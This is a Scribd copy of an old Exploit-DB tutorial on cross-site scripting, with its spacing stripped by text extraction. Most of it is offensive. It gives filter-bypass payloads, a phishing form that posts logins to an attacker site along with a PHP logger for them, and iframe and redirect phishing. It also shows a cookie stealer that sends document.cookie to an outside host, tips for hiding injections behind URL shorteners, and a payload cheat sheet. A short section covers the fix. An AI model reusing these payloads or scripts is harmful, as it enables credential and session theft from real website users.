Scribd
Upload
249 views

Advanced XSS Hack

Index: ° ‐‐( I ]> Introduction . ° ‐‐( II ]> What exactly is XSS ? . ° ‐‐( III ]> How to execute XSS commands. ° ‐‐( IV ]> Bypass techniques . ° ‐‐( V ]> What can we do with XSS ? . ° ‐‐( VI ]> How to fix XSS leakages . °

Uploaded by

qasdfgt
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
249 views

Advanced XSS Hack

Index: ° ‐‐( I ]> Introduction . ° ‐‐( II ]> What exactly is XSS ? . ° ‐‐( III ]> How to execute XSS commands. ° ‐‐( IV ]> Bypass techniques . ° ‐‐( V ]> What can we do with XSS ? . ° ‐‐( VI ]> How to fix XSS leakages . °

Uploaded by

qasdfgt
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

<|
[___________________________________________________________________________]
|>

[AdvancedXSSKnowledge]

writtenbynovaca!ne

<|
[___________________________________________________________________________]
|>
#Author:novaca!ne
#Date:23.03.2010

.................
Contact:[email protected]
Website:www.novacaine.biz.

Artworkby:Vincenzo.

Greetzflyoutto:.

Vincenzo,J0hn.X3r,fred777,.
h0yt3r,EasyLaster,td0s,
Lorenz,Montaxx,maoshe,Palme.
andfreehack.com
.................
....................
Index:
(I]>Introduction.

(II]>WhatexactlyisXSS?.

(III]>HowtoexecuteXSScommands.

(IV]>Bypasstechniques.

(V]>WhatcanwedowithXSS?.

(VI]>HowtofixXSSleakages.

https://www.exploitdb.com/papers/13646/

1/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

(VII]>CheatSheets.
...................

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(I]>Introduction
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$Dearreader,IwrotethisWhitepapertosumupeverythingIknow
aboutXSS.
$Itwaswrittentoshareknowledge,knowledgeshouldbefreeand
available
$foreveryone.
$YoucanpostandcopythisWhitepaperasmuchasyouwant,but
respectthe
$author'scopyrights.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(II]>WhatexactlyisXSS?

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$"XSS"isashortformfor:"CrossSiteScripting"asyoucansee
bythename,XSS
$dealswithscripting.Tobemoreexact:Javascript.
$It'saboutinjecting(almost)everyJavascript(andhtml/css)
$command/scriptinawebsite.
$XSSflawscomesupeverytimeawebsitedoesn'tfilterthe
attackersinput.
$Inotherwords:
$theattackercaninjecthismaliciousscriptintoawebsite,and
thebrowserjust
$run'sthecodeorscript.
$Thereare3typesofXSS,I'mgoingtotalkaboutthe2most
used:
$ReflectedXSSAttack:
$Whenaattackerinjecthismaliciousscriptintoasearchquery,
asearchbox,
$ortheendofanurl,it'scalledReflectedXSSAttack.It's
likethrowingaball
$againstawallandreceivehimback.
$StoredXSSAttack:
$IswhenaninjectedXSSscriptisstoredpermanentonawebsite,
forexamplein
$aguestbookorbulletinboard.StoredXSShit'severyonewho
justreachesthe
$sitewiththemaliciouscode.
https://www.exploitdb.com/papers/13646/

2/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

$DOMbasedXSS:
$Thisisarareusedmethod,perhapsI'mgoingtowriteanother
Whitepaperabout
$DOMbasedXSSattack.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(III]>HowtoexecuteXSScommands

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$Actually,injectingaXSSscriptisveryeasy.Tocheckifthe
targetwebsiteis
$vulnerable,justlookoutforasearchboxorsomething.
$Let'ssaythisishowasimple,unsecuredsearchfunctionlooks
like:
contentofindex.html
<html>
<head>
<title>Google</title>
</head>
<body>

<formmethod="get"action="search.php">
Google:
<inputtype="text"name="search"size="20"/>
<inputtype="submit"class="button"value="Submit"/>
</form>

</body>
</html>
contentofgoogle.php
<?phpecho$_GET['search'];?>
#I'mgoingtousethisscriptasanexamplefortherestofthis
paper#
$Let'ssaythisscriptisstoredonawebspace,whenItypein:
$123
$thenitleadsmetotheurl:
http://site.ru/google.php?search=123
$andshowsme
https://www.exploitdb.com/papers/13646/

3/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

123
$Butnow,let'strytoinjectasimplejavascriptalertmessage:
<script>alert("turtles");</script>
$andsendit.
$Youcanreplace"turtles"withanyotherwordyouwant,andeven
use''instead
$of""forexample:
<script>alert('1234');</script>
$ButI'mkeepusing"turtles"asexamplefortherestofthis
paper.
$Thetargetwebsitelet'susknowifit'svulnerablewhenit
printsapopupcontaining
$|=========||======|
$|turtles|or|1234|
$|=========||======|
$Insteadofthecalledcode,wecaneveninjecteverysimplehtml
tagse.g.:
<h1><fontcolor="#00FF00">Iliketurtles</font></h1>
$andsendit.
$Also,youcanpastethecodeattheendoftheurl,andvisit
thesitelike:
www.site.ru/google.php?search=<script>alert('turtles');</script>
$or
www.site.ru/google.php?search=<h1><fontcolor="#00FF00">Ilike
turtles</font></h1>
#It'sliketheattackerisdeterminingthecontentofthe
website.#
$Butevenifthisdoesn'twork,there'snoreasontoworry:that
meansthewebsite
$usesfiltertechniquestoavoidXSSflaws.Buttherearealso
waysto
$bypassthosefilters.Howthisworks,you'regoingtoreadin
thenextchapter.
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
https://www.exploitdb.com/papers/13646/

4/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

|(IV]>Bypasstechniques
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$TherearealotofwaystobypassXSSfiltersonwebsites,I'll
numbersome:
$1.)magic_quotes_gpc=ONbypass
$2.)HEXencoding
$3.)Obfuscation
$4.)Tryingaround
$1.)magic_quotes_gpc=ONisaphpsetting(php.ini).
$Itcausesthatevery'(singlequote),"(doublequote)and
\(backslash)
$areescapedwithabackslashautomatically.It'salsoawell
knownmethod
$toavoidXSSflaws,althoughit'sexploitable.

$Howtobypassitwhenit'sON?usethejavascriptfunction
called
$String.fromCharCode(),justconvertyourtextindecimal
characters
$(e.g.here:http://www.asciizeichen.de/tabelle.html)andput
theminthehandling.
$Using"turtles"(withoutquotesign)willlooklikethis:

String.fromCharCode(116,117,114,116,108,101,115)

$nowinsertthisinyouralertscript:
www.site.ru/google.php?search=
<script>alert(String.fromCharCode(116,117,114,116,108,101,
115));</script>
$2.)HEXencodingisausefulbypassmethod,too.Usingthis
stepwillencode
$yourscript,soyoucan'tseeclearlyonthefirstlook
whatthecodewillcause.
$Thisishow
<script>alert(/turtles/);</script>
$lookslikeencryptedinHEX:
www.site.ru/google.php?

search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%

$3.)Obfuscationsometimeswebsiteadministratorsimplyput
https://www.exploitdb.com/papers/13646/

5/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

wordslike
$"script","alert()","''"onthe"badwordslist",thatmeans,
whenyou
$searchfor"script"onthewebsite,itjustshowsyouan
error,like
$"youarenotallowedtosearchforthisword"orsomething.
$butthisisaweakprotection,youcanbypassitusing
obfuscation.
$yourjavascriptcodelike:
<sCrIpT>alert('turtles');</ScRiPt>
$Therearelikeunlimitedpossibilities,butthatleadsusto
the
$nextchapter...
$4.)Tryingaround:sometimesyoujustgottotryaround,because
everywebsite
$issecured/unsecuredinadifferent,uniqueway.Some
doesn'tevenuse
$cookiesforexample.Alway'skeepalookatthewebsite's
sourcecode!
$SometimesyouneedtoadjustyourXSSscript,like:
"><script>alert(/turtles/);</script>
$Thisyouneedsometimesifyouinjectedyourcodeintoa
searchboxe.g.and
$interruptahtmltag,soyoufirstneedtoclosehim,thenstart
anew
$tag(<script>...).
$Anyway,therearelot'sofdifferentmethodshowtobypassXSS
filtration,
$tryaround!

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(V]>WhatcanwedowithXSS?

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$TilnowIshowedyouhowtospawnajavascriptalertmessageon
awebsite.
$ButnowI'llshowyouhowharmfulsuchaXSSflawcanbefor
yourwebsite.Hereare
$someattacktechniquesyoucandowithaXSSflaw:
$1.)InjectaPhishingscript
$2.)IframePhishing
https://www.exploitdb.com/papers/13646/

6/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

$3.)RedirictPhishing
$4.)Cookiestealing
$1.)Phishingscriptinject:Justinjecta'user'and'password'
fieldinhtml
$(Withthe<html>and<body>tags),thatthevictimmaythink
heneed's
$tologintothetargetsite.
$Hereanexample:
www.site.ru/google.php?search=<html><body><head><meta
content="text/html;charset=utf8"></meta></head>
<divstyle="textalign:center;"><formMethod="POST"
Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage:<br/><br/>Username:<br/><inputname="User"/>
<br/>Password:<br/>
<inputname="Password"type="password"/><br/><br/><input
name="Valid"value="Ok!"type="submit"/>
<br/></form></div></body></html>
contentofphishingscript.php
<?php
$login=$_POST['user'];
$password=$_POST['Password'];
$open=fopen('log.txt','a+');
fputs($open,'Username:'.$login.'<br>'.'
Password:'.$password.'<br>'.'<br>');
?>
$2.)IframePhishing:Simplething,justinjectajavascriptcode
containingan
$iframewhereyourphishingsiteisembeeded.
$Obviouslyitneedstolookjustlikethetargetsite.
$Hereanexample:
www.site.ru/google.php?search=<iframe
src="http://www.yourphishingsite.ru"height="100%"width="100%">
</iframe>
$(Note:height="100%"width="100%"meansthatthewholewindowis
filledwith
$thatiframe.)
$ThetargetsitewillspawnyourphishingsiteinanIframe,and
thewebsiteuser/victimswon'tseea
$differenceandlogin(Ifthey'rearefoolishenough).
https://www.exploitdb.com/papers/13646/

7/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

$3.)RedirictionPhishing:Alsosimple,justinjectajavascript
rediriction
$scriptthatleadstoyourphishingsite,ofcourseitneeds
tolookjust
$likethetargetsite.
$Hereanexample:
www.site.ru/google.php?search=
<script>document.location.href="http://www.yourphishingsite.ru"
</script>
$or
www.site.ru/google.php?search=<METAHTTPEQUIV="refresh"
CONTENT="0;URL="http://www.yorphishingsite.ru">
$4.)Cookiestealing:OneofthefearedthingsinXSSflawsis
thecookiestealing
$attack.Inthismethodyouneedtodofollowing:
$Placethiscookiestealer.phpinyourhoster,andtheninject
ajavascript
$withyourcookiestealerscriptembeddedonyourtarget
website.

contentofcookiestealer.php(founditsomewherewithgoogle)
<?php
$cookie=$HTTP_GET_VARS["cookie"];
$file=fopen('log.txt','a');
fwrite($file,$cookie."nn");
fclose($file);
?>
$Saveitascookiestealer.phpandcreatea'log.txt'andupload
bothfiles
$onyourownwebspace,inthesamedirectoryandset"chmod777".
$Injectthefollowingcodeinyourtargetwebsite:
http://www.site.ru/google.php?search=<script>location.href=
'http://phishingsite.ru/cookiestealer.php?
cookie='+document.cookie;</script>
$Thenthevictim'scookie(target'swebsiteuserwhovisitedthe
urlabove)should
$appearinthelog.txt.
$Nowyousimplyneedtoinsertthecookie(withe.g.livehttp
https://www.exploitdb.com/papers/13646/

8/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

headersfirefoxaddon)
$anduseit.
$Obviouslyyouneedtoreplace
http://www.yourphishingsite.ru
$Withtheurlofyourphishingsite.
#PROTIP:renameyour'cookiestealer.php'tosomethinglike
'turtles.php',#
#thislookslesssuspicous.
#
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.
~>
|(VI]>HowtofixXSSleakages

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$XSSflawscanbeverydangerousforyourwebsite,eventhough
youcaneasily
$secureyourownwebsiteusingthefollowingfunctions.
##########################################################
##
#htmlspecialchars()#
#http://php.net/manual/de/function.htmlspecialchars.php#
##
##########################################################
Exampleusage:
google.php:
<?phpechohtmlspecialchars($_GET['search']);?>
$OR
##########################################################
##
#htmlentities()#
#http://php.net/manual/de/function.htmlentities.php#
##
##########################################################
Exampleusage:
google.php:
https://www.exploitdb.com/papers/13646/

9/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

<?phpechohtmlentities($_GET['search']);?>
$Whathappened?thefunctionsimplyreplacedeveryspecialchar
toaharmlesshtmlchar.
$ForexamplewhenIenter
<script>alert("turtles");</script>
$itappears
<script>alert("turtles");</script>
$Butwithoutanypopup,becausethe<,>,',"
$turnedinto<,>,',"
$Theattackersinputhasbecomeaharmless,unexecutablehtml
code.
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(VII]>CheatSheets
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$HereistheXSScheatsheet,whereIgotmostofthemfrom
http://ha.ckers.org/xss.html.
$Enjoy.
'';!"<XSS>=&{()}
<SCRIPTSRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMGSRC="javascript:alert('XSS');">
<IMGSRC=javascript:alert('XSS')>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=`javascript:alert("RSnakesays,'XSS'")`>
<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">
<IMGSRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMGSRC=javascript:alert('XSS')>
<IMGSRC=javascript:alert('XSS')>
<IMGSRC=javascript:alert('XSS')>
<IMGSRC="javascript:alert('XSS');">
<IMGSRC="jav

ascript:alert('XSS');">

https://www.exploitdb.com/papers/13646/

10/11

28/03/2016

VulnerabilityAnalysis,SecurityPapers,ExploitTutorialsPart13646

<IMGSRC="jav
ascript:alert('XSS');">
#############################################################
##
#PROTIPFOREVERYXSSINJECTION:#
#useurlshortenerservicessuchastinyurl.comorbit.ly#
#to'hide'yourinjection,sothevictimwon'tknowwhat's#
#behindthaturl.#
##
#############################################################
ENDOFFILE

https://www.exploitdb.com/papers/13646/

11/11

You might also like